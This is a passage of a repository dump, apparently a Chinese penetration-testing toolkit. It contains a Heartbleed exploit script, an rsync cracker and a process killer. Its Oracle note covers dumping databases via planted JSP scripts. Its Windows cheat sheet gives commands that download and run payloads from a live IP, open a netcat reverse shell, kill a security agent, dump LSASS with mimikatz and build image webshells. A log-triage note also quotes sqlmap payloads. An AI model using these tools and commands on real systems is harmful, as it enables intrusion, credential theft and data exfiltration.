52 | );
53 | }
54 | echo file_get_contents($url, false, stream_context_create($context));
55 | }
56 |
57 |
58 |
59 |
60 |
61 |
62 | ?>
63 |
--------------------------------------------------------------------------------
/misc/rsync.py:
--------------------------------------------------------------------------------
1 |
2 | from common import *
3 | import sys, socket, time, os, subprocess, Queue
4 | from subprocess import *
5 | from lib.ThreadGetKey import *
6 |
7 |
8 | NORMAL = 0
9 | ERROR = 1
10 | TIMEOUT = 5
11 |
12 | class ThreadGetKey(threading.Thread):
13 | def run(self):
14 | try:
15 | chr = msvcrt.getch()
16 | if chr == 'q':
17 | print "stopped by your action ( q )"
18 | os._exit(1)
19 | except:
20 | os._exit(1)
21 |
22 |
23 | def ping(ip , port , timeout=10):
24 | return 1
25 | try:
26 | cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
27 | cs.settimeout(float(timeout))
28 | address = (str(ip), int(port))
29 | status = cs.connect_ex((address))
30 | if status == NORMAL :
31 | return 1;
32 | except Exception , e:
33 | print ERROR
34 | print "error:%s" % e
35 | return ERROR
36 | cs.close()
37 | return 0
38 |
39 |
40 | def rsync(file):
41 | global host_list
42 | host_list = Queue.Queue()
43 | for host in open(file, 'r'):
44 | host_list.put(host.strip())
45 | l = host_list.qsize()
46 | threads = []
47 | if l > 0 :
48 | msg("Pentest %d hosts" % l)
49 | hander = ThreadGetKey()
50 | hander.setDaemon(True)
51 | hander.start()
52 | for i in range(20):
53 | a = RsyncCarck("xx")
54 | a.start()
55 | threads.append(a)
56 | for j in threads:
57 | j.join()
58 | else :
59 | msg("No Hosts")
60 |
61 |
62 | class RsyncCarck(threading.Thread):
63 | def __init__(self, host):
64 | threading.Thread.__init__(self)
65 | self.host = host
66 |
67 | def run(self):
68 | while 1:
69 | if host_list.empty() == True:
70 | break
71 | os.exit()
72 | time.sleep(1)
73 | host = str(host_list.get())
74 | msg("Pentest "+host+" rsync")
75 | if ping(host, 873):
76 | msg("Rsync server running", 1)
77 | rsync_client = "bin\\rsync.exe "; # rsync client path
78 | pipe = os.popen(rsync_client + host + "::")
79 | msg_text = pipe.read()
80 | pipe.close()
81 | msg_arr=[]
82 | if msg_text :
83 | msg_arr = msg_text.split('\n')
84 | if len(msg_arr) > 0:
85 | msg("%d modules Found" % len(msg_arr), 1)
86 | for module in msg_arr :
87 | if module :
88 | msg("Test %s::%s" % (host,module));
89 | module = module.strip()
90 | p = Popen(rsync_client + host + "::" + module, stdin=PIPE, stdout=PIPE)
91 | req = p.stdout.readline()
92 | if req and len(req and "@ERROR") :
93 | msg("Anonymous rsync module:" + module + " found !!!", 1)
94 | else :
95 | print req
96 | else :
97 | continue
98 | else :
99 | msg("No modules Found", 2)
100 |
101 |
102 |
103 |
104 |
105 |
106 |
--------------------------------------------------------------------------------
/misc/security-bulletins.list:
--------------------------------------------------------------------------------
1 | name,url
2 | wordpress,http://wordpress.org/news/category/security/
3 | nginx,http://nginx.org/en/security_advisories.html
4 | phpmyadmin,https://www.phpmyadmin.net/security/feed/
5 | mongodb,https://www.mongodb.com/alerts
6 | openssl,http://www.openssl.org/news/vulnerabilities.html
7 | ubuntu,http://www.ubuntu.com/usn/
8 | redhat,https://securityblog.redhat.com/category/security/feed/
9 | joomla,https://developer.joomla.org/security-centre.html
10 | drupal,https://www.drupal.org/security/rss.xml
11 | struts,https://struts.apache.org/docs/security-bulletins.html
12 | tomcat,https://tomcat.apache.org/security-9.html
13 | apache_22,https://httpd.apache.org/security/vulnerabilities_22.html
14 | camel,https://camel.apache.org/security-advisories.html
15 | nodejs,https://nodesecurity.io/advisories
16 | ruby,https://www.ruby-lang.org/en/security/
17 | phpcms,http://update.v9.phpcms.cn/index.php?action=notice
18 | apache_24,https://httpd.apache.org/security/vulnerabilities_24.html
19 | discuz,http://www.discuz.net/forum-10-1.html
20 | jenkins,https://wiki.jenkins-ci.org/display/SECURITY/Home
21 | hackerone,https://hackerone.com/hacktivity?sort_type=popular&filter=type%3Aall&page=1
22 |
--------------------------------------------------------------------------------
/misc/ssltest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
4 | # The author disclaims copyright to this source code.
5 |
6 | import sys
7 | import struct
8 | import socket
9 | import time
10 | import select
11 | import re
12 | from optparse import OptionParser
13 |
14 | options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
15 | options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
16 |
17 | def h2bin(x):
18 | return x.replace(' ', '').replace('\n', '').decode('hex')
19 |
20 | hello = h2bin('''
21 | 16 03 02 00 dc 01 00 00 d8 03 02 53
22 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
23 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
24 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
25 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
26 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
27 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
28 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
29 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
30 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
31 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
32 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
33 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
34 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
35 | 00 0f 00 01 01
36 | ''')
37 |
38 | hb = h2bin('''
39 | 18 03 02 00 03
40 | 01 40 00
41 | ''')
42 |
43 | def hexdump(s):
44 | out = ''
45 | for b in xrange(0, len(s), 16):
46 | lin = [c for c in s[b : b + 16]]
47 | hxdat = ' '.join('%02X' % ord(c) for c in lin)
48 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '')for c in lin)
49 | # print ' %04x: %-48s %s' % (b, hxdat, pdat)
50 | out += '%s' % pdat
51 | print out
52 |
53 | def recvall(s, length, timeout=5):
54 | endtime = time.time() + timeout
55 | rdata = ''
56 | remain = length
57 | while remain > 0:
58 | rtime = endtime - time.time()
59 | if rtime < 0:
60 | return None
61 | r, w, e = select.select([s], [], [], 5)
62 | if s in r:
63 | data = s.recv(remain)
64 | # EOF?
65 | if not data:
66 | return None
67 | rdata += data
68 | remain -= len(data)
69 | return rdata
70 |
71 |
72 | def recvmsg(s):
73 | hdr = recvall(s, 5)
74 | if hdr is None:
75 | print 'Unexpected EOF receiving record header - server closed connection'
76 | return None, None, None
77 | typ, ver, ln = struct.unpack('>BHH', hdr)
78 | pay = recvall(s, ln, 10)
79 | if pay is None:
80 | print 'Unexpected EOF receiving record payload - server closed connection'
81 | return None, None, None
82 | print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
83 | return typ, ver, pay
84 |
85 | def hit_hb(s):
86 | s.send(hb)
87 | while True:
88 | typ, ver, pay = recvmsg(s)
89 | if typ is None:
90 | print 'No heartbeat response received, server likely not vulnerable'
91 | return False
92 |
93 | if typ == 24:
94 | print 'Received heartbeat response:'
95 | hexdump(pay)
96 | if len(pay) > 3:
97 | print 'WARNING: server returned more data than it should - server is vulnerable!'
98 | else:
99 | print 'Server processed malformed heartbeat, but did not return any extra data.'
100 | return True
101 |
102 | if typ == 21:
103 | print 'Received alert:'
104 | hexdump(pay)
105 | print 'Server returned error, likely not vulnerable'
106 | return False
107 |
108 | def main():
109 | opts, args = options.parse_args()
110 | if len(args) < 1:
111 | options.print_help()
112 | return
113 |
114 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
115 | print 'Connecting...'
116 | sys.stdout.flush()
117 | s.connect((args[0], opts.port))
118 | print 'Sending Client Hello...'
119 | sys.stdout.flush()
120 | s.send(hello)
121 | print 'Waiting for Server Hello...'
122 | sys.stdout.flush()
123 | while True:
124 | typ, ver, pay = recvmsg(s)
125 | if typ == None:
126 | print 'Server closed connection without sending Server Hello.'
127 | return
128 | # Look for server hello done message.
129 | if typ == 22 and ord(pay[0]) == 0x0E:
130 | break
131 |
132 | print 'Sending heartbeat request...'
133 | sys.stdout.flush()
134 | s.send(hb)
135 | hit_hb(s)
136 |
137 | if __name__ == '__main__':
138 |
139 | while 1:
140 | main()
141 | #break
142 | time.sleep(3)
143 |
144 |
--------------------------------------------------------------------------------
/misc/tasklist.vbs:
--------------------------------------------------------------------------------
1 | ''''''''''''''''''''''''''''''''''''
2 | ' tasktool.vbs@b4dboy
3 | ''''''''''''''''''''''''''''''''''''
4 |
5 | On Error Resume Next
6 | Dim obj, pross, pid, killName
7 | pid = WScript.Arguments(1)
8 | killName = WScript.Arguments(0)
9 |
10 | Set obj = GetObject("Winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
11 | Set pross = obj.Execquery("Select * From Win32_Process")
12 | Wscript.echo "[PID]" & VbTab & "[ProName]"
13 |
14 | For Each proccess In pross
15 | If (WScript.Arguments.Count = 2) And (CStr(pid) = CStr(proccess.ProcessID)) Then
16 | proccess.Terminate 0
17 | ElseIf Ucase(proccess.Name) = Ucase(killName) Then
18 | proccess.Terminate 0
19 | Else
20 | WScript.echo proccess.ProcessID & VbTab & proccess.Name
21 | End If
22 | Next
23 |
--------------------------------------------------------------------------------
/note/audit-log.md:
--------------------------------------------------------------------------------
1 |
2 | #运维日志排查记录
3 | ## 前言
4 | 记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。
5 |
6 | ##常用命令
7 |
8 | 1. 查找关键词并统计行数
9 | ```bash
10 | cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l
11 | ```
12 | 2. 删除含有匹配字符的行
13 | ```bash
14 | sed -i '/Indy Library/d' 2015_7_25_test_access.log
15 | ```
16 | 3. 查找所有日志中的关键词
17 | ```bash
18 | find ./ -name "*.log" |xargs grep "sqlmap" |wc -l
19 | ```
20 | 4. 获取特殊行(如id)并且排序统计
21 | ```bash
22 | cat cszl988.log | awk '{print $1}' | awk -F : '{print $2}' | sort -u | wc -l
23 | ```
24 | 5. 正则匹配内容(如提取ip)
25 | ```bash
26 | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
27 | ```
28 | 6. 去重并统计数量
29 | ```bash
30 | tail 3.log | awk '{print $7}' | sort | uniq -c
31 | ```
32 | 7. 批量提取(全流量中)数据包并且过滤数据
33 | ```bash
34 | #!/bin/bash
35 | for file in ` ls $1 `
36 | do
37 | parse_pcap -vvb $file | grep -v "Host:" | grep -v "Cookie:" | grep -v "User-Agent:" | grep -v "Accept:" | grep -v "Accept:" | grep -v "Accept-Language:" | grep -v "Accept-Encoding:" | grep -v "Connection:" | grep -v "Content-Type:" | grep -v "Content-Length" | grep -v "Server"
38 | done
39 | ```
40 | 8. url 解码
41 | ```bash
42 | cat luban.log | grep sqlmap | awk '{print $7}' | xargs python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])'
43 | ```
44 | 9. 欢迎补充....
45 |
46 |
47 | ##示范:xxxx站注入日志排查
48 | * 查看所有sqlmap注入记录条数
49 | ```bash
50 | [root@pentest temp]# cat luban.log | grep sqlmap | wc -l
51 | 1241
52 | ```
53 | * 预览几条url
54 | ```bash
55 | cat luban.log | grep sqlmap | awk '{print $7}' | more
56 | /news.php?id=771%28.%28%22%29.%27%29%29%27&fid=168
57 | /news.php?id=771%27IddP%3C%27%22%3EvCBw&fid=168
58 | /news.php?id=771%29%20AND%201148%3D8887%20AND%20%288975%3D8975&fid=168
59 | /news.php?id=771%29%20AND%208790%3D8790%20AND%20%287928%3D7928&fid=168
60 | /news.php?id=771%20AND%204294%3D9647&fid=168
61 | /news.php?id=771%20AND%208790%3D8790&fid=168
62 | /news.php?id=771%27%29%20AND%205983%3D7073%20AND%20%28%27UwRr%27%3D%27UwRr&fid=168
63 | /news.php?id=771%27%29%20AND%208790%3D8790%20AND%20%28%27hwaT%27%3D%27hwaT&fid=168
64 | /news.php?id=771%27%20AND%206578%3D7565%20AND%20%27EoTZ%27%3D%27EoTZ&fid=168
65 | /news.php?id=771%27%20AND%208790%3D8790%20AND%20%27lBdL%27%3D%27lBdL&fid=168
66 | /news.php?id=771%25%27%20AND%205177%3D1107%20AND%20%27%25%27%3D%27&fid=168
67 | /news.php?id=771%25%27%20AND%208790%3D8790%20AND%20%27%25%27%3D%27&fid=168
68 | ```
69 | * 方便查看 urldecode
70 | ```bash
71 | cat luban.log | grep sqlmap | awk '{print $7}' | xargs python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])'
72 | /news.php?id=771&fid=168
73 | /news.php?id=771&fid=168 AND ASCII(SUBSTRING((SELECT DISTINCT(COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32)))) FROM pg_tables OFFSET 1 LIMIT 1)::text FROM 3 FOR 1))>
74 | 97
75 | /news.php?id=771&fid=168 UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(103)||CHR(75)||CHR(78)||CHR(87)||CHR(76)||CHR(74)||CHR(110)||CHR(1
76 | 15)||CHR(100)||CHR(85))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(113)||CHR(71)||C
77 | HR(74)||CHR(82)||CHR(101)||CHR(120)||CHR(69)||CHR(112)||CHR(117)||CHR(79))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
78 | ```
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
--------------------------------------------------------------------------------
/note/linux.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/note/linux.txt
--------------------------------------------------------------------------------
/note/oracle.md:
--------------------------------------------------------------------------------
1 | Oracle拖库指南
2 | ===================================
3 | ###目录
4 |
5 | 1 常用sql语句
6 | 2 sqlplus
7 | 3 jsp 脱裤脚本
8 | 4 Asp .net 版脱裤脚本
9 | 5 ColdFusion 版脱裤脚本
10 | 6 oracle 整表预览 jsp 脚本
11 | 7 编码
12 | 8 参考
13 |
14 | ###常用sql语句
15 | 查询所有表
16 |
17 | SELECT * FROM ALL_TABLES
18 |
19 | 查询当前用户表
20 |
21 | select table_name from user_tables;
22 |
23 |
24 | 查询所有表按大小排序
25 |
26 | SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc
27 | select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc
28 |
29 | 查询表前十条
30 |
31 | select * from users where rownum < 10
32 |
33 | 分页查询 2000000 到 4000000
34 |
35 | SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000
36 |
37 | ###sqlplus
38 |
39 | ####rpm 安装
40 |
41 | http://eduunix.ccut.edu.cn/index2/database/Oracle%20Instant%20Client/oracle-instantclient-sqlplus-11.1.0.1-1.i386.rpm
42 | http://eduunix.ccut.edu.cn/index2/database/Oracle%20Instant%20Client/oracle-instantclient-basic-11.1.0.1-1.i386.rpm
43 | rpm -ivh oracle-instantclient-sqlplus-11.1.0.1-1.i386.rpm
44 | rpm -ivh oracle-instantclient-basic-11.1.0.1-1.i386.rpm
45 |
46 | 配置libs
47 |
48 | vi /etc/ld.so.conf
49 | /usr/lib/oracle/11.1.0.1/client/lib/
50 |
51 | 连接
52 |
53 | 交互式操作
54 |
55 | sqlplus usewr/pass@172.100.100.41:1521/orabi
56 | @/tmp/1.sql
57 | 非交互式
58 |
59 | sqlplus -s user/pass@172.100.100.41 @/tmp/1.sql
60 |
61 | 1.sql
62 |
63 |
64 | SET feedback off
65 | SET newpage NONE
66 | SET pagesize 50000
67 | SET linesize 300
68 | SET verify off
69 | SET pagesize 0
70 | SET term off
71 | SET trims ON
72 | SET heading off
73 | SET trimspool ON
74 | SET trimout ON
75 | SET timing off
76 | SET verify off
77 | SET colsep |
78 | spool /var/www/css/1.txt
79 | SELECT user_name||','||password||','||DATA||','||id FROM USER WHERE rownum < 100 ;
80 | spool off
81 |
82 |
83 | ####导出CSV格式
84 |
85 |
86 | SET feedback off
87 | SET newpage NONE
88 | SET pagesize 0
89 | SET linesize 5000
90 | SET verify off
91 | SET term off
92 | SET trims ON
93 | SET heading off
94 | SET trimspool ON
95 | SET trimout ON
96 | SET timing off
97 | SET verify off
98 | SET colsep |
99 | spool D:\007.csv
100 | SELECT 'id,username,password' FROM dual;
101 | SELECT id||','||username||','||password FROM admin WHERE rownum<100;
102 | spool off
103 |
104 |
105 |
106 | ###jsp 脱裤脚本
107 |
108 | <%@ page contentType="text/html;charset=UTF-8"%>
109 | <%@ page import="java.io.*,java.lang.*,java.sql.*"%>
110 | <%
111 |
112 | Class.forName("oracle.jdbc.driver.OracleDriver");
113 | Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
114 | File f = new File("/webapps/ROOT/css/t1.txt");
115 | BufferedWriter bw = new BufferedWriter(new FileWriter(f));
116 | Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
117 | ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000");
118 | ResultSetMetaData rsmd = rs.getMetaData();
119 | int numberOfColumns = rsmd.getColumnCount();
120 | for(int i=1;i
142 |
143 |
144 | ###ColdFusion 版脱裤脚本
145 |
146 |
147 |
148 |
149 |
150 | SELECT * FROM MEMBER
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 | ###oracle 整表预览 jsp 脚本
160 |
161 | <%@ page contentType="text/html;charset=UTF-8"%>
162 | <%@ page import="java.io.*,java.lang.*,java.sql.*"%>
163 | <%
164 |
165 | Class.forName("oracle.jdbc.driver.OracleDriver");
166 | Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
167 | Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
168 | String html="";
169 | File file = new File("/tmp/data.txt");
170 | BufferedReader br = new BufferedReader(new FileReader(file));
171 | String line;
172 | while ((line = br.readLine()) != null) {
173 |
174 | html=html+""+line+":
";
175 | ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
176 | ResultSetMetaData rsmd = rs.getMetaData();
177 | int numberOfColumns = rsmd.getColumnCount();
178 | for(int i=1;i"+rsmd.getColumnName(i)+"";
181 | }
182 | html+="
";
183 | while (rs.next())
184 | {
185 |
186 | html+="";
187 | for(int i=1;i"+rs.getString(i)+"";
190 |
191 |
192 | }
193 | html+="
";
194 | }
195 | rs.close();
196 | html+="|
";
197 | }
198 | File f = new File("/tmp/info.css");
199 | BufferedWriter bw = new BufferedWriter(new FileWriter(f));
200 | bw.write(html);
201 |
202 |
203 | bw.close();
204 | br.close();
205 | stmt.close();
206 | conn.close();
207 |
208 | %>
209 |
210 | ###编码问题
211 |
212 | 查询当前编码
213 |
214 | select userenv('language') from dual;
215 |
216 | 命令行执行
217 |
218 | export NLS_LANG="american_america.AL32UTF8"
219 |
220 | ###参考
221 |
222 | http://liuxun.org/blog/linux-xia-occi-bian-cheng/
223 |
--------------------------------------------------------------------------------
/note/windows.txt:
--------------------------------------------------------------------------------
1 | 1:合成shell
2 | copy xx.png /b +think.php /a 1.jpg
3 |
4 | 2:取消共享文件夹安全警告
5 | @echo off
6 | Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f
7 |
8 | 3:搞死安全狗 3.x
9 | ntsd -c q -pn SafeDogGuardCenter.exe
10 | 4:命令行ftp一句话下载
11 | cd c:\temp\ && echo set xPost = createObject("Microsoft.XMLHTTP") > 1.vbs && echo xPost.Open "GET","http://23.92.17.103/scripts/x",0 >> 1.vbs && echo xPost.Send() >> 1.vbs && echo Set sGet = createObject("ADODB.Stream") >> 1.vbs && (echo sGet.Mode = 3) >> 1.vbs && (echo sGet.Type = 1) >> 1.vbs && echo sGet.Open() >> 1.vbs && echo sGet.Write(xPost.responseBody) >> 1.vbs && echo sGet.SaveToFile "x" >> 1.vbs && cscript 1.vbs
12 | (echo open 123.242.230.24)> c:/temp/1.txt && (echo tonysir)>>c:/temp/1.txt && (echo 5Zk3Kcmv)>>c:/temp/1.txt && (echo type binary) >> c:/temp/1.txt && echo get 1.exe >> c:/temp/1.txt && echo bye >> c:/temp/1.txt && ftp -s:c:/temp/1.txt && dir c:\temp
13 | 5:nc 反弹
14 | /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
15 |
16 | 6:rar 压缩
17 | rar a -r d:/d.rar d:/test ( -r 子目录)
18 |
19 | 7:NC
20 | nc -v -L -p 443
21 | nc -nvv 127.0.0.1 200
22 | nc -t -e cmd.exe 192.168.1.102 2012
23 | nc -nvv 127.0.0.1 443
24 |
25 | 8:mimikatz
26 | @echo off
27 | cd %~dp0
28 | mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
29 | pause
30 |
31 | Procdump.exe -accepteula -ma lsass.exe lsass.dmp
32 |
33 |
34 |
35 |
36 | mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
37 |
38 | 9:dir
39 |
40 | dir /s
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/note/zgrab_1.md:
--------------------------------------------------------------------------------
1 | # 基于zmap 的应用层扫描器 zgrab (一)
2 |
3 | ## 介绍
4 | zgrab 是基于zmap无状态扫描的应用层扫描器,可以自定义数据包,以及ip,domain之间的关联。可用于快速指纹识别爆破等场景。
5 |
6 | ## 安装
7 | * go环境
8 |
9 | * zgrab
10 |
11 | ```bash
12 | go get github.com/zmap/zgrab
13 | cd $GOPATH/src/github.com/zmap/zgrab
14 | go build
15 | ```
16 | ## 使用
17 |
18 | ### 参数
19 | zgrab -help
20 |
21 | | 参数 | 注释 | 示范 |
22 | | -------- | -----: | -----: |
23 | | port | 端口 | --port 80 |
24 | | data | 发送数据包并且返回响应 | --data http-req-domain |
25 |
26 | ### 输入
27 | #### zmap 扫描结果
28 | 输入流可以使用zmap 的扫描结果,例如项目主页的例子
29 |
30 | ```bash
31 | zmap -p 443 --output-fields=* | ztee results.csv | zgrab --port 443 --tls --data=./http-req --output-file=banners.json
32 | ```
33 | 其中 http-req 为自定义的数据包
34 |
35 | ```bash
36 | [root@pw_node_1 zgrab]# cat http-req
37 | GET / HTTP/1.1
38 | Host: %s
39 | ```
40 | #### 域名列表
41 | ip,domain 的文件,例如
42 |
43 | ```bash
44 | [root@pw_node_1 zgrab]# cat 2.csv
45 | 36.51.255.148,tinyjun.com
46 | 36.51.255.148,i6618.com
47 | 36.51.255.148,www.linwen.com
48 | 36.51.255.148,lujunda.cn
49 | 36.51.255.148,haohaomai.com
50 | 36.51.255.148,it1208.com
51 | 36.51.255.148,www.lijinmao.com
52 | 36.51.255.148,lushao.cn
53 | 36.51.255.148,i6618.com
54 | 36.51.255.148,www.it-case.com
55 | 36.51.255.148,zhihub.com
56 | 36.51.255.148,wwww.yaseng.org
57 | ```
58 | cat 2.csv | ./zgrab –port 80 --data http-req-domain
59 | ### 输出
60 | 默认输出为json ,可以使用jq 工具解析
61 | ### 示范
62 | 扫描 127.0.0.1,localhost
63 | 效果如图
64 | 
65 |
66 | 命令行
67 |
68 | ```bash
69 | [root@pw_node_1 zgrab]# cat 3.csv
70 | 127.0.0.1,localhost
71 | [root@pw_node_1 zgrab]# cat /tmp/3.csv | ./zgrab --port 80 --data http-req-domain | jq "."
72 | {
73 | "data": {
74 | "write": "GET / HTTP/1.1\r\nHost: localhost\r\n\r\n",
75 | "read": "HTTP/1.1 200 OK\r\nDate: Sun, 27 Dec 2015 17:33:43 GMT\r\nServer: Apache/2.2.15 (CentOS)\r\nLast-Modified: Fri, 11 Dec 2015 14:51:21 GMT\r\nETag: \"82db1-e-526a074ea5571\"\r\nAccept-Ranges: bytes\r\nContent-Length: 14\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\nhello yaseng\n"
76 | },
77 | "timestamp": "2015-12-28T01:33:43+08:00",
78 | "domain": "localhost",
79 | "ip": "127.0.0.1"
80 | }
81 | {
82 | "sni_support": true,
83 | "ca_file_name": null,
84 | "mail_type": null,
85 | "tls_version": null,
86 | "timeout": 10,
87 | "port": 80,
88 | "success_count": 1,
89 | "failure_count": 0,
90 | "total": 1,
91 | "start_time": "2015-12-28T01:33:43+08:00",
92 | "end_time": "2015-12-28T01:33:43+08:00",
93 | "duration": 0,
94 | "senders": 1000
95 | }
96 | [root@pw_node_1 zgrab]# curl localhost
97 | hello yaseng
98 | [root@pw_node_1 zgrab]#
99 | ```
100 | ### 自定义数据包
101 | 可以自定义http 数据包,例如
102 |
103 | ```bash
104 | [root@pw_node_1 zgrab]# cat http-req-domain
105 | GET /1.php HTTP/1.1
106 | Host: %d
107 | ```
108 |
109 | ## 实例:快速指纹识别
110 | 例如需要在一大批域名列表里面快速识别wordpress,并且输出域名。
111 | 首先从header 里面找出wp 的指纹以
112 |
113 | ```bash
114 | [root@pw_node_1 zgrab]# curl -I yaseng.org
115 | HTTP/1.1 200 OK
116 | Server: nginx/1.2.6
117 | Date: Sun, 27 Dec 2015 17:59:25 GMT
118 | Content-Type: text/html; charset=UTF-8
119 | Connection: keep-alive
120 | Expires: Thu, 19 Nov 1981 08:52:00 GMT
121 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
122 | Pragma: no-cache
123 | X-Pingback: http://yaseng.org/xmlrpc.php
124 | Via: 10.17.21.22
125 | Set-Cookie: saeut=11111151239164757346; path=/; max-age=311040000
126 | Set-Cookie: PHPSESSID=86483bb31b614b6f5a9513854a27e321; path=/; HttpOnly
127 | ```
128 | 使用 字符串 X-Pingback 来做识别指纹
129 | 识别命令为
130 |
131 | ```bash
132 | cat domain.log | ./zgrab --port 80 --data http-req-domain | grep 'X-Pingback' | jq '.domain' | awk -F '"' '{print $2}'
133 | ```
134 |
135 | 其中 domain.log 为 1w ip 到域名 ip,domain 映射
136 | 分分钟即可识别完,示范如图
137 | 
138 |
139 | ## 参考
140 | 1:https://github.com/zmap/zgrab
141 |
142 |
--------------------------------------------------------------------------------
/project/device_mode_toggle/@devicemodetoggle-1.0.0.xpi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/@devicemodetoggle-1.0.0.xpi
--------------------------------------------------------------------------------
/project/device_mode_toggle/README.md:
--------------------------------------------------------------------------------
1 | #device mode toggle
2 | @author yaseng@uauc.net
3 | @desc a simple device mode toggle tool
4 |
5 |
6 | ## 相关资料
7 |
8 | firefox 扩展开发笔记(一):jpm 使用实践以及调试
9 | http://yaseng.org/firefox-addon-development-notes-with-jpm.html
10 |
11 | firefox 扩展开发笔记(二):进阶开发之移动设备模拟
12 | http://yaseng.org/firefox-addon-mobile-device-toggle.html
13 |
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-16.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-32.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-32.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-48.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-64.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/index.js:
--------------------------------------------------------------------------------
1 | /**
2 | *@name index.js
3 | *@desc a simple device mode toggle tool
4 | *@author yaseng@uauc.net
5 | **/
6 |
7 |
8 | var { ToggleButton } = require("sdk/ui/button/toggle");
9 | var prefs = require("sdk/preferences/service");
10 | var key = "general.useragent.override";
11 |
12 |
13 | var button = ToggleButton({
14 | id: "Mobile-toggle",
15 | label: "Toggle mobile mode",
16 | icon: {
17 | "16": "./icon-16.png",
18 | "32": "./icon-32.png",
19 | "64": "./icon-64.png"
20 | },
21 | onChange: handleClick
22 | });
23 |
24 |
25 | function handleClick(state) {
26 |
27 | var mobile_user_agent='Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4';
28 | if (state.checked){
29 |
30 | prefs.set(key,mobile_user_agent);
31 |
32 | }else{
33 |
34 | prefs.reset(key);
35 |
36 | }
37 |
38 | }
--------------------------------------------------------------------------------
/project/device_mode_toggle/package.json:
